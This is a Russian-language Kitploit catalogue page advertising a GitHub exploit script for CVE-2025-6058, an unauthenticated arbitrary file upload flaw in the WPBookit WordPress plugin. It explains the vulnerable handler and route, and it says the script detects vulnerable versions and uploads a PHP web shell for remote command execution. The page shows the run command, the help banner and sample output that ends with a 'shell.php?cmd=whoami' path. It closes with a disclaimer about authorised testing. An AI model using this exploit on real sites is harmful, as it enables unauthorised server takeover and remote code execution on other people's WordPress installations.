Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-6058 — WPBookit <= 1.0.4 - Неаутентифицированная произвольная загрузка файлов | Kitploit
Инструменты/GitHubGitHub/nxploited/cve-2025-6058
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и Образование
GitHubnxploited/cve-2025-6058

CVE-2025-6058

WPBookit <= 1.0.4 - Неаутентифицированная произвольная загрузка файлов

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

⚡ WPBookit <= 1.0.4 - Неаутентифицированная произвольная загрузка файлов


📝 Описание

Плагин WPBookit для WordPress уязвим к произвольной загрузке файлов из-за отсутствия проверки типа файла в функции image_upload_handle(), которая подключается через маршрут add_booking_type во всех версиях вплоть до 1.0.4 включительно.
Эта уязвимость позволяет неаутентифицированным злоумышленникам загружать произвольные файлы на сервер сайта, что потенциально может привести к удалённому выполнению кода.

CVEОценка CVSSДата публикацииДата обновления
CVE-2025-60589.8 (Критическая)11 июля 202512 июля 2025

🚀 Что делает этот эксплойт?

Этот эксплойт автоматизирует следующие действия:

  • Определение, работает ли на цели уязвимая версия WPBookit (<= 1.0.4)
  • Загрузку PHP-шелла через уязвимый маршрут без аутентификации
  • Подтверждение загрузки шелла и предоставление его точного пути для удалённого выполнения команд

🛠️ Использование

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🖥️ Пример

root@kitploit:~
python3 CVE-2025-6058.py -u http://target.com/wordpress

🆘 Пример справки и баннера

root@kitploit:~
python CVE-2025-6058.py -help

  ______   __     __  ________       ______    ______    ______   _______            ______    ______   _______    ______  
 /      \ /  |   /  |/        |     /      \  /      \  /      \ /       |          /      \  /      \ /       |  /      \ 
/$$$$$$  |$$ |   $$ |$$$$$$$$/     /$$$$$$  |/$$$$$$  |/$$$$$$  |$$$$$$$/          /$$$$$$  |/$$$$$$  |$$$$$$$/  /$$$$$$  |
$$ |  $$/ $$ |   $$ |$$ |__  ______$$____$$ |$$$  \$$ |$$____$$ |$$ |____   ______ $$ \__$$/ $$$  \$$ |$$ |____  $$ \__$$ |
$$ |      $$  \ /$$/ $$    |/      |/    $$/ $$$$  $$ | /    $$/ $$      \ /      |$$      \ $$$$  $$ |$$      \ $$    $$< 
$$ |   __  $$  /$$/  $$$$$/ $$$$$$//$$$$$$/  $$ $$ $$ |/$$$$$$/  $$$$$$$  |$$$$$$/ $$$$$$$  |$$ $$ $$ |$$$$$$$  | $$$$$$  |
$$ \__/  |  $$ $$/   $$ |_____     $$ |_____ $$ \$$$$ |$$ |_____ /  \__$$ |        $$ \__$$ |$$ \$$$$ |/  \__$$ |$$ \__$$ |
$$    $$/    $$$/    $$       |    $$       |$$   $$$/ $$       |$$    $$/         $$    $$/ $$   $$$/ $$    $$/ $$    $$/ 
 $$$$$$/      $/     $$$$$$$$/     $$$$$$$$/  $$$$$$/  $$$$$$$$/  $$$$$$/           $$$$$$/   $$$$$$/   $$$$$$/   $$$$$$/  
                                                                                                                           
                                                                                                                           
                                                                                                                           

Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

usage: CVE-2025-6058.py [-h] -u URL

CVE-2025-6058 WPBookit <= 1.0.4 - Unauthenticated Arbitrary File Upload | by Khaled Alenazi (Nxploited)

options:
  -h, --help     show this help message and exit
  -u, --url URL  Target URL e.g http(s)://target.com/wordpress

📤 Вывод

root@kitploit:~
[*] Checking plugin version ...
[*] Exploiting file upload ...
[+] Exploitation successful!
[+] Shell path: wp-content/uploads/2025/07/shell.php?cmd=whoami
Exploit By : Khaled Alenazi (Nxploited ) GitHub: https://github.com/Nxploited

⚠️ Отказ от ответственности

Этот инструмент предоставляется только в образовательных целях и для авторизованного тестирования безопасности.
Автор не несёт ответственности за любое неправомерное использование или несанкционированную деятельность.
Используйте на свой страх и риск и всегда убеждайтесь, что у вас есть разрешение на тестирование целевой системы.


Автор: Khaled Alenazi (Nxploited)

Скачать инструмент